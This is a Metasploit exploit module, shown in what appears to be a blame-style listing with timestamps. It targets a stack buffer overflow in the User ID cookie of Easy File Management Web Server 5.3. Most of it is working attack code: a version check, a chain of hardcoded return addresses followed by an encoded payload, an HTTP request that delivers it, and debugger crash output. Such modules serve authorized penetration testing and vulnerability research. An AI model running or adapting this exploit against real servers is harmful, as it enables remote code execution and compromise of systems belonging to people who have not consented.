2014-06-08 11:21:14 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = NormalRanking # Reliable memory corruption
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Easy File Management Web Server v5.3 Stack Buffer Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
Easy File Management Web Server contains a stack buffer overflow
|
|
|
|
condition that is triggered as user-supplied input is not properly
|
|
|
|
validated when handling the User ID cookie. This may allow a remote
|
|
|
|
attacker to execute arbitrary code.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'superkojiman', # Vulnerability discovery
|
|
|
|
'Julien Ahrens', # Exploit
|
|
|
|
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['OSVDB', '107241'],
|
|
|
|
['EDB', '33610'],
|
|
|
|
['BID', '67542'],
|
|
|
|
['URL', 'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'],
|
|
|
|
['URL', 'http://www.web-file-management.com/']
|
|
|
|
],
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'ExitFunction' => 'process'
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'BadChars' => "\x00\x0a\x0d;",
|
|
|
|
'Space' => 3420 # Lets play it safe
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
# Successfully tested efmws.exe (5.3.0.0) on:
|
|
|
|
# -- Microsoft Windows XP [Version 5.1.2600]
|
|
|
|
# -- Microsoft Windows [Version 6.1.7600]
|
|
|
|
# -- Microsoft Windows [Version 6.3.9600]
|
|
|
|
[ 'efmws 5.3 Windows Universal', { 'Ret' => 0x10010101 } ]
|
|
|
|
# PPR from ImageLoad.dll
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'May 20 2014',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp'])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
|
|
|
|
#
|
|
|
|
# NOTE: Version 5.3 still reports "4.0" in the "Server" header
|
|
|
|
#
|
|
|
|
|
|
|
|
res = send_request_raw 'uri' => '/whatsnew.txt'
|
2014-06-09 16:31:14 +00:00
|
|
|
unless res
|
2014-06-08 11:21:14 +00:00
|
|
|
vprint_status "#{peer} - No response to request"
|
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
end
|
|
|
|
if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
|
|
|
|
version = "#{$1}"
|
|
|
|
vprint_status "#{peer} - Found version: #{version}"
|
|
|
|
if version == "5.3"
|
|
|
|
return Exploit::CheckCode::Appears
|
|
|
|
end
|
|
|
|
end
|
|
|
|
if res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
end
|
|
|
|
Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
2014-06-09 10:23:14 +00:00
|
|
|
#
|
|
|
|
# Check if target doesn't appear to be vulnerable, if so exit
|
|
|
|
# NOTE: if reported as detected continue incase whatsnew.txt is not reachable
|
|
|
|
#
|
|
|
|
|
|
|
|
unless check == Exploit::CheckCode::Appears || Exploit::CheckCode::Detected
|
|
|
|
fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws 5.3")
|
|
|
|
end
|
|
|
|
|
2014-06-08 11:21:14 +00:00
|
|
|
#
|
|
|
|
# Fu to JMP ESP where payload lives
|
|
|
|
# NOTE: Opcode 'JMP ESP' only existed in V5.3
|
|
|
|
#
|
|
|
|
|
|
|
|
sploit = rand_text(80)
|
|
|
|
sploit << [0x1001D8C8].pack("V")
|
|
|
|
sploit << rand_text(280)
|
|
|
|
sploit << [target.ret].pack("V")
|
|
|
|
sploit << [0xA445ABCF].pack("V")
|
|
|
|
sploit << [0x10010125].pack("V")
|
|
|
|
sploit << [0x10022AAC].pack("V")
|
|
|
|
sploit << rand_text(8)
|
|
|
|
sploit << [0x1001A187].pack("V")
|
|
|
|
sploit << [0x1002466D].pack("V")
|
|
|
|
sploit << payload.encoded
|
|
|
|
|
|
|
|
print_status "#{peer} - Trying target #{target.name}..."
|
|
|
|
|
|
|
|
#
|
|
|
|
# NOTE: Successful HTTP request is required to trigger
|
|
|
|
#
|
|
|
|
|
|
|
|
send_request_cgi({
|
|
|
|
'uri' => normalize_uri(target_uri.path),
|
|
|
|
'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;",
|
|
|
|
}, 5)
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
=begin
|
|
|
|
|
|
|
|
#
|
|
|
|
# 0x44f57d This will write UserID up the stack. If the UserID is to large it
|
|
|
|
# will overwrite a pointer which is used later on at 0x468702
|
|
|
|
#
|
|
|
|
|
|
|
|
eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac
|
|
|
|
eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0 nv up ei pl nz na po nc
|
|
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
|
|
|
|
fmws+0x4f57d:
|
|
|
|
0044f57d f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
|
|
|
|
0:004> dd @esi
|
|
|
|
01668084 41414141 41414141 41414141 41414141
|
|
|
|
01668094 41414141 41414141 41414141 41414141
|
|
|
|
016680a4 41414141 41414141 41414141 41414141
|
|
|
|
016680b4 41414141 41414141 41414141 41414141
|
|
|
|
016680c4 41414141 41414141 41414141 41414141
|
|
|
|
016680d4 41414141 41414141 41414141 41414141
|
|
|
|
016680e4 41414141 41414141 41414141 41414141
|
|
|
|
016680f4 41414141 41414141 41414141 41414141
|
|
|
|
|
|
|
|
(c38.8cc): Access violation - code c0000005 (first chance)
|
|
|
|
First chance exceptions are reported before any exception handling.
|
|
|
|
This exception may be expected and handled.
|
|
|
|
eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc
|
|
|
|
eip=00468702 esp=015197c0 ebp=ffffffff iopl=0 nv up ei pl nz na pe nc
|
|
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
|
|
|
fmws+0x68702:
|
|
|
|
00468702 ff5228 call dword ptr [edx+28h] ds:0023:41414169=????????
|
|
|
|
|
|
|
|
=end
|